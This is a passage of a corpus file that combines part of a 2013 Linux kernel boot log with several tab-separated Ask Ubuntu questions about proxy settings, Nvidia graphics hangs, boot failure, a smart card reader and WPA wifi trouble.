4-0:1.0 : 4 ports detected [ 2.410113 ] usbcore : registered new interface driver libusual [ 2.410143 ] i8042 : pnp : ps/2 controller [ pnp0303 : ps2k , pnp0f13 : ps2m ] at 0x60,0x64 irq 1,12 [ 2.415449 ] serio : i8042 kbd port at 0x60,0x64 irq 1 [ 2.415454 ] serio : i8042 aux port at 0x60,0x64 irq 12 [ 2.415525 ] mousedev : ps/2 mouse device common for all mice [ 2.415958 ] rtc_cmos 00:06 : rtc core : registered rtc_cmos as rtc0 [ 2.415987 ] rtc0 : alarms up to one month , y3k , 242 bytes nvram , hpet irqs [ 2.416045 ] device-mapper : uevent : version 1.0.3 [ 2.416094 ] device-mapper : ioctl : 4.22.0-ioctl ( 2011-10-19 ) initialised : dm-devel @ redhat.com [ 2.416274 ] cpuidle : using governor ladder [ 2.416536 ] cpuidle : using governor menu [ 2.416538 ] efi variables facility v0.08 2004-may-17 [ 2.416685 ] tcp cubic registered [ 2.416754 ] net : registered protocol family 10 [ 2.417051 ] net : registered protocol family 17 [ 2.417054 ] registering the dns_resolver key type [ 2.417158 ] pm : hibernation image not present or could not be loaded . [ 2.417168 ] registered taskstats version 1 [ 2.421661 ] input : at translated set 2 keyboard as /devices/platform/i8042/serio0/input/input3 [ 2.423679 ] magic number : 1:687:910 [ 2.423777 ] rtc_cmos 00:06 : setting system clock to 2013-02-11 00:55:33 utc ( 1360544133 ) [ 2.424968 ] bios edd facility v0.16 2004-jun-25 , 0 devices found [ 2.424970 ] edd information not available . [ 2.625772 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 2.625802 ] ata2 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) [ 2.625829 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 2.626098 ] ata2.00 : acpi cmd ef/10:06:00:00:00:00 ( set features ) succeeded [ 2.626106 ] ata2.00 : acpi cmd f5/00:00:00:00:00:00 ( security freeze lock ) filtered out [ 2.626111 ] ata2.00 : acpi cmd b1/c1:00:00:00:00:00 ( device configuration overlay ) filtered out [ 2.626460 ] ata2.00 : ata-9 : sandisk ssd i100 8gb , 11.56.04 , max udma/133 [ 2.626466 ] ata2.00 : 15649200 sectors , multi 1 : lba48 ncq ( depth 31/32 ) [ 2.626897 ] ata2.00 : acpi cmd ef/10:06:00:00:00:00 ( set features ) succeeded [ 2.626905 ] ata2.00 : acpi cmd f5/00:00:00:00:00:00 ( security freeze lock ) filtered out [ 2.626911 ] ata2.00 : acpi cmd b1/c1:00:00:00:00:00 ( device configuration overlay ) filtered out [ 2.627113 ] ata2.00 : configured for udma/133 [ 2.627746 ] ata3.00 : atapi : tsstcorp dvdwbd sn-406ab , sc00 , max udma/100 [ 2.628655 ] ata3.00 : configured for udma/100 [ 2.632375 ] ata1.00 : acpi cmd ef/10:06:00:00:00:00 ( set features ) succeeded [ 2.632378 ] ata1.00 : acpi cmd f5/00:00:00:00:00:00 ( security freeze lock ) filtered out [ 2.632380 ] ata1.00 : acpi cmd b1/c1:00:00:00:00:00 ( device configuration overlay ) filtered out [ 2.637750 ] usb 1-1 : new high-speed usb device number 2 using ehci_hcd [ 2.638782 ] ata1.00 : ata-8 : st1000lm024 hn-m101mbb , 2ar10002 , max udma/133 [ 2.638785 ] ata1.00 : 1953525168 sectors , multi 16 : lba48 ncq ( depth 31/32 ) , aa [ 2.645343 ] ata1.00 : acpi cmd ef/10:06:00:00:00:00 ( set features ) succeeded [ 2.645351 ] ata1.00 : acpi cmd f5/00:00:00:00:00:00 ( security freeze lock ) filtered out [ 2.645357 ] ata1.00 : acpi cmd b1/c1:00:00:00:00:00 ( device configuration overlay ) filtered out [ 2.651767 ] ata1.00 : configured for udma/133 [ 2.651875 ] scsi 0:0:0:0 : direct-access ata st1000lm024 hn-m 2ar1 pq : 0 ansi : 5 [ 2.652003 ] sd 0:0:0:0 : [ sda ] 1953525168 512-byte logical blocks : ( 1.00 tb/931 gib ) [ 2.652005 ] sd 0:0:0:0 : [ sda ] 4096-byte physical blocks [ 2.652032 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 [ 2.652043 ] sd 0:0:0:0 : [ sda ] write protect is off [ 2.652045 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 2.652067 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 2.652340 ] scsi 1:0:0:0 : direct-access ata sandisk ssd i100 11.5 pq : 0 ansi : 5 [ 2.652455 ] sd 1:0:0:0 : attached scsi generic sg1 type 0 [ 2.652460 ] sd 1:0:0:0 : [ sdb ] 15649200 512-byte logical blocks : ( 8.01 gb/7.46 gib ) [ 2.652527 ] sd 1:0:0:0 : [ sdb ] write protect is off [ 2.652528 ] sd 1:0:0:0 : [ sdb ] mode sense : 00 3a 00 00 [ 2.652538 ] sd 1:0:0:0 : [ sdb ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 2.653043 ] sdb : sdb1 [ 2.653288 ] sd 1:0:0:0 : [ sdb ] attached scsi disk [ 2.654182 ] scsi 2:0:0:0 : cd-rom tsstcorp dvdwbd sn-406ab sc00 pq : 0 ansi : 5 [ 2.661010 ] sr0 : scsi3-mmc drive : 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray [ 2.661016 ] cdrom : uniform cd-rom driver revision : 3.20 [ 2.661217 ] sr 2:0:0:0 : attached scsi cd-rom sr0 [ 2.661399 ] sr 2:0:0:0 : attached scsi generic sg2 type 5 [ 2.730438 ] sda : sda1 sda2 sda3 < sda5 sda6 sda7 sda8 > [ 2.731535 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 2.732475 ] freeing unused kernel memory : 924k freed [ 2.732559 ] write protecting the kernel read-only data : 12288k [ 2.735652 ] freeing unused kernel memory : 1604k freed [ 2.737989 ] freeing unused kernel memory : 1196k freed [ 2.749204 ] udevd [ 122 ] : starting version 175 [ 2.766839 ] r8169 gigabit ethernet driver 2.3lk-napi loaded [ 2.766861 ] r8169 0000:03:00.0 : pci int a - > gsi 19 ( level , low ) - > irq 19 [ 2.766903 ] r8169 0000:03:00.0 : setting latency timer to 64 [ 2.766989 ] r8169 0000:03:00.0 : irq 43 for msi/msi-x [ 2.767354 ] r8169 0000:03:00.0 : eth0 : rtl8168evl/8111evl at 0xffffc90005788000 , 50 : b7 : c3:70:40 : ef , xid 0c900800 irq 43 [ 2.767357 ] r8169 0000:03:00.0 : eth0 : jumbo features [ frames : 9200 bytes , tx checksumming : ko ] [ 2.770053 ] hub 1-1:1.0 : usb hub found [ 2.770137 ] hub 1-1:1.0 : 6 ports detected [ 2.885369 ] usb 2-1 : new high-speed usb device number 2 using ehci_hcd [ 3.013176 ] refined tsc clocksource calibration : 2394.562 mhz . [ 3.013184 ] switching to clocksource tsc [ 3.017787 ] hub 2-1:1.0 : usb hub found [ 3.017886 ] hub 2-1:1.0 : 6 ports detected [ 3.182243 ] ext4-fs ( sda6 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 3.184904 ] usb 3-2 : new full-speed usb device number 2 using xhci_hcd [ 3.276920 ] usb 1-1.2 : new full-speed usb device number 3 using ehci_hcd [ 3.444675 ] usb 1-1.4 : new high-speed usb device number 4 using ehci_hcd [ 3.728245 ] usb 2-1.5 : new full-speed usb device number 3 using ehci_hcd [ 11.636873 ] adding 8000508k swap on /dev/sda8 . priority : -1 extents:1 across:8000508k [ 11.639205 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 11.669475 ] udevd [ 460 ] : starting version 175 [ 11.700500 ] lp : driver loaded but no devices found [ 11.706353 ] wmi : mapper loaded [ 11.780739 ] mei : module is from the staging directory , the quality is unknown , you have been warned . [ 11.781047 ] mei 0000:00:16.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 11.781054 ] mei 0000:00:16.0 : setting latency timer to 64 [ 11.781111 ] mei 0000:00:16.0 : irq 44 for msi/msi-x [ 11.782881 ] [ drm ] initialized drm 1.1.0 20060810 [ 11.786724 ] i915 0000:00:02.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 11.786729 ] i915 0000:00:02.0 : setting latency timer to 64 [ 11.786804 ] cfg80211 : calling crda to update world regulatory domain [ 11.790222 ] bluetooth : core ver 2.16 [ 11.790237 ] net : registered protocol family 31 [ 11.790238 ] bluetooth : hci device and connection manager initialized [ 11.790240 ] bluetooth : hci socket layer initialized [ 11.790241 ] bluetooth : l2cap socket layer initialized [ 11.790245 ] bluetooth : sco socket layer initialized [ 11.790484 ] bluetooth : generic bluetooth usb driver ver 0.6 [ 11.790678 ] usbcore : registered new interface driver btusb [ 11.793130 ] intel ( r ) wireless wifi link agn driver for linux , in-tree : [ 11.793132 ] copyright ( c ) 2003-2011 intel corporation [ 11.793169 ] iwlwifi 0000:02:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 11.793177 ] iwlwifi 0000:02:00.0 : setting latency timer to 64 [ 11.793199 ] iwlwifi 0000:02:00.0 : pci_resource_len = 0x00002000 [ 11.793201 ] iwlwifi 0000:02:00.0 : pci_resource_base = ffffc9000579c000 [ 11.793203 ] iwlwifi 0000:02:00.0 : hw revision id = 0x24 [ 11.793278 ] iwlwifi 0000:02:00.0 : irq 45 for msi/msi-x [ 11.793309 ] iwlwifi 0000:02:00.0 : detected 6035 series 2x2 agn/bt , rev=0xb0 [ 11.793367 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 11.795349 ] linux video capture interface : v2.00 [ 11.795759 ] uvcvideo : found uvc 1.00 device webcam sc-13hdl11939n ( 2232:1029 ) [ 11.799810 ] type=1400 audit ( 1360536942.882:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=569 comm= '' apparmor_parser '' [ 11.800118 ] type=1400 audit ( 1360536942.886:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=569 comm= '' apparmor_parser '' [ 11.800295 ] type=1400 audit ( 1360536942.886:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=569 comm= '' apparmor_parser '' [ 11.806591 ] input : webcam sc-13hdl11939n as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.4/1-1.4:1.0/input/input4 [ 11.806657 ] usbcore : registered new interface driver uvcvideo [ 11.806659 ] usb video class driver ( 1.1.1 ) [ 11.809329 ] iwlwifi 0000:02:00.0 : device eeprom ver=0x756 , calib=0x6 [ 11.809333 ] iwlwifi 0000:02:00.0 : device sku : 0x1f0 [ 11.809334 ] iwlwifi 0000:02:00.0 : valid tx ant : 0x3 , valid rx ant : 0x3 [ 11.809364 ] iwlwifi 0000:02:00.0 : tunable channels : 13 802.11bg , 24 802.11a channels [ 11.830663 ] cfg80211 : world regulatory domain updated : [ 11.830665 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 11.830667 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 11.830668 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 11.830670 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 11.830671 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 11.830672 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 11.848283 ] mtrr : type mismatch for d0000000,10000000 old : write-back new : write-combining [ 11.848285 ] [ drm ] mtrr allocation failed . graphics performance may suffer . [ 11.848529 ] i915 0000:00:02.0 : irq 46 for msi/msi-x [ 11.848533 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 11.848534 ] [ drm ] driver supports precise vblank timestamp query . [ 11.848578 ] [ drm : intel_dsm_platform_mux_info ] *error* mux info call failed [ 11.848626 ] [ drm : intel_dsm_platform_mux_info ] *error* mux info call failed [ 11.849139 ] vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+mem , decodes=none : owns=io+mem [ 11.849140 ] vgaarb : transferring owner from pci:0000:00:02.0 to pci:0000:01:00.0 [ 11.859090 ] mxm : guid detected in bios [ 11.859188 ] vga switcheroo : detected optimus dsm method \_sb_.pci0.peg0.pegp handle [ 11.859208 ] nouveau 0000:01:00.0 : power state changed by acpi to d0 [ 11.859211 ] nouveau 0000:01:00.0 : power state changed by acpi to d0 [ 11.859214 ] nouveau 0000:01:00.0 : enabling device ( 0006 - > 0007 ) [ 11.859220 ] nouveau 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 11.859223 ] nouveau 0000:01:00.0 : setting latency timer to 64 [ 11.902814 ] iwlwifi 0000:02:00.0 : loaded firmware version 18.168.6.1 [ 11.902964 ] registered led device : phy0-led [ 11.902989 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 11.904632 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 12.074986 ] input : razer razer deathadder as /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0/input/input5 [ 12.075086 ] generic-usb 0003:1532:0016.0001 : input , hidraw0 : usb hid v1.11 mouse [ razer razer deathadder ] on usb-0000:00:14.0-2/input0 [ 12.076297 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/1-1.2:1.0/input/input6 [ 12.076579 ] generic-usb 0003:046d : c52f.0002 : input , hidraw1 : usb hid v1.11 mouse [ logitech usb receiver ] on usb-0000:00:1a.0-1.2/input0 [ 12.078457 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/1-1.2:1.1/input/input7 [ 12.078574 ] generic-usb 0003:046d : c52f.0003 : input , hiddev0 , hidraw2 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:1a.0-1.2/input1 [ 12.078586 ] usbcore : registered new interface driver usbhid [ 12.078587 ] usbhid : usb hid core driver [ 12.440059 ] fbcon : inteldrmfb ( fb0 ) is primary device [ 12.440127 ] console : switching to colour frame buffer device 200x56 [ 12.440144 ] fb0 : inteldrmfb frame buffer device [ 12.440145 ] drm : registered panic notifier [ 12.440329 ] [ firmware bug ] : acpi ( pegp ) defines _dod but not _dos [ 12.495875 ] acpi device:10 : registered as cooling_device10 [ 12.496017 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/device:0e/lnxvideo:00/input/input8 [ 12.496073 ] acpi : video device [ pegp ] ( multi-head : yes rom : yes post : no ) [ 12.496773 ] acpi device:1e : registered as cooling_device11 [ 12.496911 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:01/input/input9 [ 12.496949 ] acpi : video device [ gfx0 ] ( multi-head : yes rom : no post : no ) [ 12.496987 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 12.497049 ] snd_hda_intel 0000:00:1b.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 [ 12.497102 ] snd_hda_intel 0000:00:1b.0 : irq 47 for msi/msi-x [ 12.497124 ] snd_hda_intel 0000:00:1b.0 : setting latency timer to 64 [ 12.499079 ] [ drm ] nouveau 0000:01:00.0 : unsupported chipset 0x0e7110a2 [ 12.500023 ] nouveau 0000:01:00.0 : pci int a disabled [ 12.500028 ] nouveau : probe of 0000:01:00.0 failed with error -22 [ 12.685413 ] psmouse serio1 : synaptics : touchpad model : 1 , fw : 7.5 , id : 0x1e0b1 , caps : 0xf00133/0x240000/0xa2400 [ 12.726984 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input10 [ 13.046646 ] hdmi status : codec=3 pin=5 presence_detect=0 eld_valid=0 [ 13.046702 ] input : hda intel pch hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input11 [ 13.046808 ] input : hda intel pch mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input12 [ 13.046886 ] input : hda intel pch headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input13 [ 13.187374 ] ext4-fs ( sda6 ) : re-mounted . opts : errors=remount-ro [ 13.418485 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 13.597752 ] ext4-fs ( sda7 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 13.773567 ] init : failsafe main process ( 847 ) killed by term signal [ 13.979151 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 13.979154 ] bluetooth : bnep filters : protocol multicast [ 13.979462 ] bluetooth : rfcomm tty layer initialized [ 13.979466 ] bluetooth : rfcomm socket layer initialized [ 13.979467 ] bluetooth : rfcomm ver 1.11 [ 14.001127 ] type=1400 audit ( 1360536945.090:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/tcpdump '' pid=941 comm= '' apparmor_parser '' [ 14.001311 ] type=1400 audit ( 1360536945.090:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=934 comm= '' apparmor_parser '' [ 14.001504 ] type=1400 audit ( 1360536945.090:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=935 comm= '' apparmor_parser '' [ 14.001814 ] type=1400 audit ( 1360536945.090:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=935 comm= '' apparmor_parser '' [ 14.001861 ] type=1400 audit ( 1360536945.090:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=938 comm= '' apparmor_parser '' [ 14.001990 ] type=1400 audit ( 1360536945.090:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=935 comm= '' apparmor_parser '' [ 14.002143 ] type=1400 audit ( 1360536945.090:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=939 comm= '' apparmor_parser '' [ 14.014131 ] ppdev : user-space parallel port driver [ 14.166960 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 14.173796 ] iwlwifi 0000:02:00.0 : radio type=0x2-0x1-0x0 [ 14.462337 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 14.469169 ] iwlwifi 0000:02:00.0 : radio type=0x2-0x1-0x0 [ 14.572591 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 14.573361 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 14.668796 ] r8169 0000:03:00.0 : eth0 : link down [ 14.669210 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 14.669408 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 19.586954 ] cfg80211 : found new beacon on frequency : 2472 mhz ( ch 13 ) on phy0 [ 22.313833 ] wlan0 : authenticate with 00:1f:45 : e7:70:58 ( try 1 ) [ 22.316920 ] wlan0 : authenticated [ 22.323272 ] wlan0 : associate with 00:1f:45 : e7:70:58 ( try 1 ) [ 22.328328 ] wlan0 : rx assocresp from 00:1f:45 : e7:70:58 ( capab=0x411 status=0 aid=4 ) [ 22.328330 ] wlan0 : associated [ 22.331370 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 22.331415 ] cfg80211 : calling crda for country : tr [ 22.333597 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 22.333600 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333601 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 22.333603 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333604 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 22.333606 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333607 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 22.333608 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333610 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 22.333611 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333612 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 22.333614 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333615 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 22.333616 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333618 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 22.333619 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333620 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 22.333622 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333623 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 22.333624 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333626 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 22.333627 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333628 ] cfg80211 : updating information on frequency 2467 mhz for a 20 mhz width channel with regulatory rule : [ 22.333630 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333631 ] cfg80211 : updating information on frequency 2472 mhz for a 20 mhz width channel with regulatory rule : [ 22.333632 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333634 ] cfg80211 : updating information on frequency 5180 mhz for a 20 mhz width channel with regulatory rule : [ 22.333635 ] cfg80211 : 5170000 khz - 5250000 khz @ 20000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333636 ] cfg80211 : updating information on frequency 5200 mhz for a 20 mhz width channel with regulatory rule : [ 22.333638 ] cfg80211 : 5170000 khz - 5250000 khz @ 20000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333639 ] cfg80211 : updating information on frequency 5220 mhz for a 20 mhz width channel with regulatory rule : [ 22.333640 ] cfg80211 : 5170000 khz - 5250000 khz @ 20000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333642 ] cfg80211 : updating information on frequency 5240 mhz for a 20 mhz width channel with regulatory rule : [ 22.333643 ] cfg80211 : 5170000 khz - 5250000 khz @ 20000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333644 ] cfg80211 : updating information on frequency 5260 mhz for a 20 mhz width channel with regulatory rule : [ 22.333646 ] cfg80211 : 5250000 khz - 5330000 khz @ 20000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333647 ] cfg80211 : updating information on frequency 5280 mhz for a 20 mhz width channel with regulatory rule : [ 22.333648 ] cfg80211 : 5250000 khz - 5330000 khz @ 20000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333650 ] cfg80211 : updating information on frequency 5300 mhz for a 20 mhz width channel with regulatory rule : [ 22.333651 ] cfg80211 : 5250000 khz - 5330000 khz @ 20000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333652 ] cfg80211 : updating information on frequency 5320 mhz for a 20 mhz width channel with regulatory rule : [ 22.333654 ] cfg80211 : 5250000 khz - 5330000 khz @ 20000 khz ) , ( n/a mbi , 2000 mbm ) [ 22.333655 ] cfg80211 : disabling freq 5500 mhz [ 22.333656 ] cfg80211 : disabling freq 5520 mhz [ 22.333656 ] cfg80211 : disabling freq 5540 mhz [ 22.333657 ] cfg80211 : disabling freq 5560 mhz [ 22.333658 ] cfg80211 : disabling freq 5580 mhz [ 22.333659 ] cfg80211 : disabling freq 5600 mhz [ 22.333660 ] cfg80211 : disabling freq 5620 mhz [ 22.333660 ] cfg80211 : disabling freq 5640 mhz [ 22.333661 ] cfg80211 : disabling freq 5660 mhz [ 22.333662 ] cfg80211 : disabling freq 5680 mhz [ 22.333663 ] cfg80211 : disabling freq 5700 mhz [ 22.333664 ] cfg80211 : disabling freq 5745 mhz [ 22.333664 ] cfg80211 : disabling freq 5765 mhz [ 22.333665 ] cfg80211 : disabling freq 5785 mhz [ 22.333666 ] cfg80211 : disabling freq 5805 mhz [ 22.333667 ] cfg80211 : disabling freq 5825 mhz [ 22.333669 ] cfg80211 : regulatory domain changed to country : tr [ 22.333670 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 22.333671 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 22.333672 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 20000 khz ) , ( n/a , 2000 mbm ) [ 22.333674 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 20000 khz ) , ( n/a , 2000 mbm ) [ 33.843292 ] wlan0 : no ipv6 routers present [ 36.317022 ] r8169 0000:03:00.0 : eth0 : link up [ 36.317442 ] addrconf ( netdev_change ) : eth0 : link becomes ready
253635	how to set root proxy settings via command line ?	i am using fabric to deploy a project and have run into an issue : fabric does not currently ( as far as i 'm aware ) have the ability to specify options to it sudo command , therefore i can not use sudo -e to use the local users proxy settings . how can i go about setting the proxy settings for root . this needs to be via command line as i 'm working on a server box withou a gui .
253638	cherry st1044 not recognized in ubuntu 12.10	i can not get ubuntu 12.10 to recognize my cherry st1044 smart terminal reader . the terminal shows the pcsc software is installed but `` no service '' is also displayed in the terminal .
253639	nvidia optimus gpu with bumblebee overclocking	i have a laptop with nvidia gt 640m le gpu , with optimus . i already made it work with bumblebee using optirun command , but i wanted to overclock it since the nvidia 's kepler chipset has a very good overclock potential . i already tried to enable nvidia-settings coolbits option , changing both x11/xorg.conf and bumblebee/xorg.conf with the `` coolbits '' `` 1 '' . but does n't show the overclocking option at nvidia-settings . does anyone know how to make it work ?
253642	video hangs with nvidia 9600 gt	system seems to `` hang in the foreground '' but continues processing in the background . this appears to happen primarily during operations that rely on 3d acceleration . my system is as follows : abit aw8d motherboard , bios is latest ( 1.3 ) corsair 800mhz ram , 8gig seagate 540gig hdd nvidia 9600 gt running on pcie 1.0b ubuntu 12.04 x64 kernel is 3.2.0-37 nvidia proprietary driver 304.64 operating mode is 1600x900x32 , which is native to the monitor ( hp 2009m ) this is a fresh install of ubuntu . in all other areas , ubuntu is rock-solid . however , when running applications that are somewhat video intensive and/or memory intensive , the system hangs . the three applications with which this problem arises are vmware workstation 9.01 when running a client with 3d acceleration enabled , when playing video from within mozilla firefox 18.02 , or when playing a video in vlc 2.0.5 . when the hang occurs , the mouse cursor either will not move at all , or lags horribly . the display remains as it was at the time the hang occurred , but rewrites do not happen at all . the system stops responding to the keyboard entirely , so the `` ctrl+alt+f1 sneaking in through an alternate virtual terminal '' trick does not work . only a hard reset `` fixes '' the problem . i have not tried sshing into the machine during a hang . it is interesting to note , however , that the system is still processing . if i am running an application that causes hard drive activity , the hard drive activity continues even after the hang . this all leads me to believe that the issue is video related . i have tried : researching within google and ask ubuntu using the tags ubuntu , 12.04 , 9600 gt , nvidia , hang , and combinations thereof . none of the results matched my situation in that the system would respond to an effort to log in to an alternate virtual terminal , whereas my system stops responding to the keyboard . trying different versions of the nvidia driver . the same issue occurs regardless of driver version . watching performance across different kernel revisions . this problem has occurred exactly the same way irrespective of kernel revision . running nvidia-settings with root privileges and saving an xorg.conf file . this has no effect upon the problem . running unity without 3d effects . i 'm not entirely sure on this one . the 3d effects appear to be present whether logging in using unity or unity 2d . in system settings > details , the experience is listed as standard in both instances . however , research within ask ubuntu showed that this relates to an incompatibility between unity and the proprietary driver , but that 3d acceleration occurs anyway . nvidia-settings shows that all is well , in that resolution , model number and gpu temperature are properly reported . any ideas as to where to go from here ? any logs or other information i might need to post ? thank you in advance for any help or suggestions you might have .
253644	problem booting after latest software update .	i have a desktop i7 with an ati hd6990 . after the last update , my system is unable to boot properly . all i can access is a terminal . i ca n't access my files . is everything lost ? here is a video i have recorded : http : //youtube.com/watch ? v=apz9zzzqq1i after a correct login and sudo apt-get update , nothing has changed . rebooting the system makes no difference . my question is : how can i retrieve my files ?
253649	trouble with wpa wifi connection - can connect to wireless networks	good afternoon , i 'm trying to set up wireless on a new install of ubuntu desktop 12.10 . i am able to connect to `` open '' wireless networks ( i am connected to my house `` guest '' wifi network right now ) - therefore the problem is not with the wireless card or firmware ( i 've done b43-fwcutter & firmware installs ) . the issue is just when trying to connect to my wpa2 secure `` normal '' wifi network ( `` bkhouse '' ) . it just wo n't seem to go ... it appears that i can connect to the ssid , but it wo n't complete the connection . help would be appreciated ! ! brandon @ linux-desktop : /etc/wpa_supplicant $ ifconfig eth0 link encap : ethernet hwaddr 00:25:64 : db:89:16 up broadcast multicast mtu:1500 metric:1 rx packets:1517 errors:0 dropped:0 overruns:0 frame:0 tx packets:944 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1802381 ( 1.8 mb ) tx bytes:95348 ( 95.3 